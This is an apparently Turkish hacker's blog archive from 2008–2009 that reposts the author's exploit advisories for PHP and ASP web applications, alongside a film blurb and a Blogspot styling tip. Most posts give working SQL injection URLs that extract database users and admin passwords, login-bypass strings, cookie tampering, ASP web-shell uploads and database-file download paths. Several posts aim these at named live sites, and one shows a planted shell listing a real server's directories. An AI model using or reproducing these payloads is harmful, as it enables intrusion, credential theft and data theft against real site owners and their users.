"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

php asp etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
php asp etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

9 Haziran 2009 Salı

Interlogy Profile Manager Basic Insecure Cookie Handling Vulnerability

kaynak: http://www.milw0rm.com/exploits/8895

kaynak: http://yildirimordulari.com/showthread.php?t=8551



desc:

normal login for cookie

pmadm=dGVzdA;

if ý do this:

pmadm=dGVzd(write any thing);

example:

pmadm=dGVzdz;

or

pmadm=dGVzd123231212313;

not login

if ý do wthis:

pmadm=dGVzd ' or ';

boom this loggin :D

exp:

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

after you go here:

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users

Host Directory PRO 2.1.0 Remote Database Backup Vulnerability

kaynak: http://www.milw0rm.com/exploits/8877

kaynak: http://yildirimordulari.com/showthread.php?t=8550

script:

http://www.phphostdirectoryscript.com/

Bypass for demo:

username: demo ' or '

pass: ZoRLu or dont write anything

http://demo-host-directory-pro.phphostdirectoryscript.com/

Backup DB Disc. for demo:

http://demo-host-directory-pro.phphostdirectoryscript.com/admin/backup/db

29 Mayıs 2009 Cuma

hitman full online izle



Filmin Konusu : Son yılların gözde bilgisayar oyunlarından Hitman’ın sinema uyarlaması olan filmin kahramanı Ajan 47 (Timothy Olyphant) profesyonel bir tetikçi olmak için eğitilmiştir ve en güçlü silahları agresif yapısı ve işindeki kararlılığıdır. Bu kez Ajan 47 tuzağa düşürülmüştür ve Doğu Avrupa’da kendisini oyundışı bırakmak isteyenleri ve bunun sebeblerini ararken Interpol ve Rus ordusu da 47’nin peşindedir.

31 Aralık 2008 Çarşamba

abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

abarcar Florist Shop System Script content.php (cat) Blind/Remote Sql inj

link: http://packetstormsecurity.org/0812-exploits/abarcarflorist-sql.txt

link: http://www.experl.com/abarcar-florist-shop-system-script-contentphp-cat-blind-remote-sql-inj-352/

Discovered By: ZoRLu

Exploit: ( remote )

http://localhost/script_path/content.php?cat=[SQL]

[SQL]=

-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


exploit for demo: ( you must look title )

http://www.angelstouch.com/content.php?cat=-9999999999999+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,unhex(hex(concat(user(),0x3a,database(),0x3a,version())))--


Exploit: ( blind )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=4 ( true )

https://www.angelstouch.com/content.php?cat=125+and+substring(@@version,1,1)=3 ( false )

abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj



abarcar Manufacturer System Script plistings.php (listingid) Blind/Remote sql inj

link: http://packetstormsecurity.org/0812-exploits/abarcarmanu-sql.txt

link: http://www.experl.com/abarcar-manufacturer-system-script-plistingsphp-listingid-blind-remote-sql-inj-353/

Discovered By: ZoRLu

Exploit: ( remote )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=[SQL]

[SQL]=

-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--


exploit for demo:

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=-99999999999999+union+all+select+0,1,2,3,4,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,unhex(hex(concat(user(),0x3a,database(),0x3a,version()))),65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103--


Exploit: ( blind )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )

http://localhost/script_path/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )


exploit for demo:

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=4 ( true )

http://www.iqffreezer.com/plistings.php?prlid=ZoRLu&listingid=40+and+substring(@@version,1,1)=3 ( false )

30 Aralık 2008 Salı

experl.com

artık böyle önemli olduğunu düşündüğüm bilgileri experl.com dada paylaşacağım nasipse. hayırlı uğurlu olsun.

28 Aralık 2008 Pazar

Blogspotta kod alanı oluşturma

yerleşim>>>html düzenle>>> ve ardından su kodu buluyoruz:



bunun öncesine de su kodlarımızı ekliyoruz:

pre { background: url(http://i39.tinypic.com/2airndc.jpg);border:1px solid #A6B0BF;font-size:120%;line-height:100%;overflow:auto;padding:10px;color:white }pre:hover {border:1px solid #efefef;}code {font-size:120%;text-align:left;margin:0;padding:0;color: #000000;}.clear { clear:both;overflow:hidden;}


bu kadar

şimdi gidiyorum kullanımınıda yarın gösterecem

edit: yarın gösterecem demiştim :)



seklinde kullanacaksınız

22 Aralık 2008 Pazartesi

E-Learning Portal Remote File Upload


E-Learning Portal Remote File Upload

link 1: http://www.exploiter5.com/all.php?id=47

link 2: http://packetstormsecurity.org/0812-exploits/elearning-upload.txt

Discovered By: ZoRLu

exp:

http://www.preprojects.com/elearning/uploaded/your_shell.asp

you register to site

login this site

after upload you_shell.asp

exp for demo:

register:

http://www.preprojects.com/elearning/new_student.asp

login:

role: select STUDENT

user: zorlu

passwd: zorlu1


shell

http://www.preprojects.com/elearning/uploaded/zehir4.asp ( Sizce Hack Benim Umrumda mI ? :S )

server daki siteler:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Time=3%3A04%3A29+AM&Path=c%3A%5Cinetpub%5Cwwwroot%5Chostnomi%5C&submit1=Git


buda golden gate:

http://www.preprojects.com/elearning/uploaded/zehir4.asp?status=2&Path=c:\inetpub\wwwroot\hostnomi\/adminpgg/pgg.ae&Time=3:19:20%20AM

E-SMART CART Remote File Upload

E-SMART CART Remote File Upload



link 1: http://packetstormsecurity.org/0812-exploits/esmartcart-upload.txt

link 2: http://www.exploiter5.com/all.php?id=48

Discovered By: ZoRLu

exp:

http://localhost/script/embadmin/base_ads/[id]_shell.asp

exp for demo:

http://preproject.com/GScart/embadmin/main_baseimage.asp?action=add

you go to here and click to gozat button, select your_shell.asp and write link

after goo shell

http://preproject.com/GScart/embadmin/base_ads/zehir4.asp

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns

Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns



link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt

link 2: http://www.exploiter5.com/all.php?id=46

Discovered By: ZoRLu

exploit for demo:

you go this link:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin

right click to on photo and you must see

http://preproject.com/pgallery/pimages/4

column number 4

and you goo this links

username:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

password:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

so for demo:

username: admin

password: admin


exp for demo: (DD)

http://preproject.com/pgallery/database/photo.mdb

PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

PRE Asp Job Board (Auth Bypass)/DD Multiple Remote Vulns

link 1: http://www.exploiter5.com/all.php?id=45

link 2: http://packetstormsecurity.org/0812-exploits/preasp-sqldisclose.txt

Discovered By: ZoRLu

exp for demo: (bypass)

login:

http://preproject.com/preaspjobboard//Employee/emp_login.asp

user: ZoRLu

passwd: ' or ' 1=1--

exp for demo: (DD)

http://preproject.com/preaspjobboard/db/pre.mdb

17 Aralık 2008 Çarşamba

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7494

link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt

Discovered By: ZoRLu


exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

yayınlanma tarihine ve gönderilme tarihine dikkat edin ilk milw0rm.com a gönderdim :D

EvimGibi Pro Resim Galerisi v1.0 (tr) resim.asp (kat_id) Sql inject

link: http://www.exploiter5.com/all.php?id=39

link: http://packetstormsecurity.org/0812-exploits/evimgibi-sql.txt

author: ZoRLu

dork: intext:"Asp Programlama : EvimGibi"

exploit:

http://localhost/script_path/resim.asp?islem=altkat&kat_id=[SQL]

[SQL]=

-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

example:

http://www.sabanciogretmenevi.com.tr/album/resim.asp?islem=altkat&kat_id=-1+union+select+1,SIFRE,3,KULLANICI_ADI+from+uyeler

16 Aralık 2008 Salı

CFAGCMS v1 (right.php title) SQL Injection Vulnerability

gönderdiğim tarihe ve yayınlandığı tarihe iyi bakın : )

CFAGCMS v1 (right.php title) SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7483

Discovered By: ZoRLu

exploit:

http://localhost/cfagcms/right.php?title=[SQL]

[SQL]=

ZoRLu'+union+select+0,concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*

9 Aralık 2008 Salı

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7392

Discovered By: ZoRLu

file:

_conf/core/common-tpl-vars.php

c0de:

require($confdir.'lang/langpack.'.$lang.'.php'); ( line 23 )

rfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?confdir=ZoRLu.txt?

lfi:

http://www.z0rlu.blogspot.com/script/_conf/core/common-tpl-vars.php?lang=[LFi]

Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln

Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7390

Discovered By: ZoRLu

exp for demo:

http://www.dotnetindex.com/demos/prodownloadmanager/admin/

user: ZoRLu

passwd: ' or '

8 Aralık 2008 Pazartesi

ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities

ASPManage Banners (RFU/DD) Multiple Remote Vulnerabilities

link: http://www.milw0rm.com/exploits/7373

Discovered By: ZoRLu

exp: ( rfu )

http://localhost/script/banners/shell.asp

exp: ( dd )

http://localhost/script/data/DataBase.mdb



rfu: ( for demo )

you go here:

http://demo.merlix.com/adbanner5/Upload.Asp

select your shell.asp

after click to upload button

go your shell.asp

http://demo.merlix.com/adbanner5/banners/xyz.asp


dd: ( for demo )

http://demo.merlix.com/adbanner5/data/DataBase.mdb

7 Aralık 2008 Pazar

ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability

ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7361

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/portal/xportal.mdb

ASP AutoDealer Remote Database Disclosure Vulnerability

ASP AutoDealer Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7360

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/autodealer/auto.mdb

ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability

ASPTicker 1.0 (news.mdb) Remote Database Disclosure Vulnerability

link: http://www.milw0rm.com/exploits/7359

Discovered By: ZoRLu

exp for demo: ( DD )

http://demo.merlix.com/ticker/news.mdb

 
Dizi